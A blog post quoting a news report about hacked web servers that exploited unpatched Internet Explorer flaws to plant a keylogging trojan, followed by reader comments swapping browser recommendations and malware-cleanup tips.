Reason Number 15,586 To Own A Mac

From CNet News, a very nasty new twist for users of Windows:

Security researchers warned Web surfers on Thursday to be on guard after uncovering evidence that widespread Web server compromises have turned corporate home pages into points of digital infection.

The researchers believe that online organized crime groups are breaking into Web servers and surreptitiously inserting code that takes advantage of two flaws in Internet Explorer that Microsoft has not yet fixed. Those flaws allow the Web server to install a program that takes control of the user’s computer.

[T]he flaws affect every user of Internet Explorer, because Microsoft has not yet released a patch. Moreover, the infectious Web sites are not just those of minor companies inhabiting the backwaters of the Web, but major companies, including some banks, said Brent Houlahan, chief technology officer of NetSec.

“There’s a pretty wide variety,” he said. “There are auction sites, price comparison sites and financial institutions.”

The group also pointed out that the malicious program uploaded to a victim’s computer is not currently detected as a virus by most antivirus software. With no patch from Microsoft, that leaves Internet Explorer users vulnerable. A representative of the software giant was not immediately available for comment on when a patch might be available.

Researchers believe that attackers seed the Web sites with malicious code by breaking into unsecured servers or by using a previously unknown vulnerability in Microsoft’s Web software, Internet Information Server (IIS). When a victim browses the site, the code redirects them to one of two sites, most often to another server in Russia. That server uses the pair of Microsoft Internet Explorer vulnerabilities to upload and execute a remote access Trojan horse, RAT, to the victim’s PC. The software records the victim’s keystrokes and opens a back door in the system’s security to allow the attacker to access the computer.

It wouldn’t surprise me a bit if this is one of the reasons why I had to completely reformat my wife’s Dell last night. After we got married and I hooked it into my broadband network, the piece of junk just exploded with adware and malware that had been sitting dormant, waiting for a fast connection. No combination of updates, blockers, cleaners, or virus software could save it; in less than 90 days, it was completely unusable.

I’m loading up Firefox for her tonight, and very strongly suggesting that she never launch IE again (even if she does have to think in Russian).


27 Responses to “Reason Number 15,586 To Own A Mac”

  1. Niall Says:

    While your there go get Thunderbird as well (the smaller standalone mozilla based email client) and get rid of ALL of the potential microsoft problems.

    And there is a simple cure for the malware problem….go get Linux ;).

  2. triticale Says:

    I just installed Firefox last night, and am favorably impressed. Too early to be sure, but it seems to have lolved the DNS trouble which was a residual of a search hijacker I’d defeated.

    As for e-mail, we’ve used Eudora for years, and we know that it has reduced virus problems along the way.

  3. chthus Says:

    Came back from Vegas to find the same type of problem (teach me not to shut down my comp). Ad-aware helped reduce the problem temporarily. Found a program (apj3kfzw.exe) that had attached to explorer. It had to be shut down and then removed, but seems to have eliminated the trouble (so far, cross fingers).

  4. Jeremy Brown Says:

    I have found, just in the past couple of months or so, that none of the major anti-virus applications are able to stop or detect some of the nastier trojans coming around — one’s you can get simply from popup ads on websites or webmail.

    Here’s what finally saved the network at my office:


    This is not a spam comment — you can do a google search and find other anti-trojan packages as well. This one, however, has been highly rated and has no significant impact on system performance.

    Bottom line: use anti-virus AND anti-trojan AND a hardware firewall (router with NAT) AND a software firewall. It seems like overkill but it’s suddenly necessary.

    Reminds me of when I lived in NYC and had to install a lock plate over my trunk lock (and a steering wheel lock, etc.)

  5. michele Says:

    I’m having a horrendous time with my Dell laptop. Random pop up ads every three seconds, windows closing out of nowhere and new windows opening, all kinds of crazy stuff that Ad Aware doesn’t seem to help with.

    I blamed my kids. Maybe it wasn’t there fault, after all. Guess I’ll ditch IE on that computer.

  6. michele Says:

    Their fault.

    I hate when I do that.

  7. Frank Says:

    >widespread Web server compromises have turned corporate home pages into points of digital infection….[T]he flaws affect every user of Internet Explorer…

    Apache fans gotta be loving this. As a Mozilla user, I would hope I’m safe.

  8. The Lonewacko Blog Says:

    Researchers believe that attackers seed the Web sites with malicious code by breaking into unsecured servers or by using a previously unknown vulnerability in Microsoft’s Web software, Internet Information Server (IIS)

    This trojan has two parts: an IE part and a part that runs on the server. Personally, I would tend to avoid any web hosting company running Windows, and the fact that these servers were running Windows would appear to be the main culprit here.

  9. Crusader Says:

    I’ve used Opera for years now, it is a decent browser.

  10. rosignol Says:

    Y’all knew it was coming, so here it is:

    neener neener
    -Mac user


    (yes, the machine I’m posting from *now* is a w2k box. My machine at home isn’t)

  11. DrSteve Says:

    Agreed. Opera’s pretty nice.

    Remind your wife to squint really hard when she switches to guns. It seemed to help Clint.

  12. andy Says:

    It’s a javascript exploit and I see Vokdapundit uses javascript, wadda ya know!

  13. none Says:

    firefox is very nice in many ways, but does anyone know how to scroll a page using any keyboard key instead of the mouse?

  14. Cybrludite Says:

    Cleaning this krep up is what I mostly do all night at work. CWShredder, Hijack This, and then Ad-Aware is my current Holy Trinity. Just be careful with Hijack This. It looks for things that appear to be using known spyware exploits, and some of those are used by legit programs as well. (Like the Nachi Worm using the same port that Ping does.) In particular, it looks askance at host table entries & things that run at bootup.

  15. Ric Locke Says:

    Another recommendation for Opera (and Eudora for email)

    One nice thing about Eudora (and, I think, Firefox, though I’ve never used that) is the setting that disallows all popups except requested ones — that is, the ones you click. You still have to wait for the ferschlugginer code to load, but it doesn’t execute until you ask it to. That makes it possible for me to, e.g., use this comment box, but I never see an unsolicited popup.

    Ric Locke

  16. Ric Locke Says:

    Opera, not Eudora… Eudora is email. Opera is a Web browser. Ric doesn’t use Preview when he should…


  17. David Mercer Says:

    Opera, Firefox, Mozilla, Safari: doesn’t really matter, just anything but bare IE on Windows!

    Eudora, Thunderbird, Apple Mail: again, just so long as it’s anything but Outlook Express on Windows!

    IE on Windows can with care be put in a ‘virtual condom’, as it were, with things like MyIE2, which is a browser that uses the IE core, but with much, much better controls over security, tabbed browsing, and pop-up blocking. Safest way to use IE if you must (and damnit, some websites I still have to use require IE).

    Yes, now we see how wonderful MS integrating everything into the OS has been. All those application bugs in IE and Outlook Express are now in the OS.


  18. Burnside Says:

    Actually, this isn’t reason 15,586 to own a Mac, but more like reason 15,586 not to use Internet Exploder.

  19. felixrayman Says:

    Linux, Firefox 0.8 ( 0.9 is way too buggy still ), and the Adblocker extension.

    No popups, no ads, no spyware, no malware, flash when and only when I want it, and best of all, tabbed browsing, which to anyone who hasn’t used it is no big deal, and to anyone who has used it is indispensable.

  20. Matt Says:

    I’m a long-term Mac-user (since 1988), but I occasionally need to use VirtualPC (running W2K) for stuff like MS Project. At some point, a piece of Malware infected IE in there and later locked up the network connection. Sometimes, I think the real malware is Windows …

  21. Beavis Says:

    Windows is a virus because it:
    -Preys on unsavvy computer users
    -Balloons in size and can eat up whole hard drives
    -Decreases the performance of the computer over time
    -Creates backdoors for other viruses and worms to infect
    -Requires reformatting and reinstalling your computer
    -Can be solved by using Linux.

  22. ras Says:

    I too am just now trying out firefox and so far am impressed.

    My benchmark: is it seamless to use, so that I can just click & go? My answer: yes, at least so far.

    Best news: it even seems faster than IE. Given Netscape’s later history, this was a really really nice surprise.

  23. Alexander Says:

    The reason Windows gets hacked/attacked by viruses so often is that it’s everywhere. If Linux had 90% of the market, I bet people would be complaining how screwed Linux was and that Windows is much better.

    Sorry, bit of a pet peeve of mine. I do a bit of programming, so I see how difficult it is to anticipate every single possibility.

  24. andy Says:

    Security by obscurity…

  25. Stewart Vardaman Says:

    Per Alexander’s comment, there is one big difference between Unix and MSFT. MSFT uses a file name’s extension to determine whether a program can be executed or not. Under Unix eXecute permissions must be specifically applied before a program can run.

    There’s no question MSDFT gets abused in a large part by their sheer market size, but there are also fundamental design issues as well.

  26. Spoons Says:

    I just got done using Firefox for about 2 weeks. I hated it. So many pages didn’t work the way I was used to — forget about all of the Movable Type tools, for example.

    I wish someone would explain to me why tabbed browsing is a good thing. I found it annoying. First, you have to use the awkward ctrl-tab to switch between tabs, rather than the familiar alt-tab that you can use if you simply have multiple instances of IE running. On top of that, lots of sites that have links set to open in new windows simply open new instances of Firefox, too. So after browsing for a while, you end up with several copies of firefox open, each with several different tabs. How is this an improvement over having 3 or 4 IEs running?

    Worst of all, once I decided I didn’t want Firefox anymore, I couldn’t get Windows to recognize IE as my default browser again. I’ve tried everything short of a complete reinstall of IE, which is what I’m probably going to have to do.

    If people love Firefox, more power to them, but I for the life of me can’t understand why.

  27. David Gillies Says:

    I’ll second (third, whatever) the Firefox recommendations. I use it on both my WinXP and Linux boxes and if and when I get a Mac I wouldn’t be too surprised if I end up using it there, too. It’s lean, very, very stable and has a consistent interface across platforms (something whose utility cannot be too highly stated). The excellent tabbed browsing is Opera-esque but I find stability to be streets ahead of Opera. It has much better support for anti-aliasing text under Linux as well.

    IE is simply too buggy to be allowed to do what it says: explore the internet. I am extremely strict about downloading and updating patches for my XP box, but I really wouldn’t be surprised if there’s a bunch of adware crawling around. Both my machines are on my broadband connection, but I mainly use the Linux box for surfing. The XP machine is for Photoshop/Illustrator and for playing Diablo II and Warcraft.

Comments are closed.

%d bloggers like this: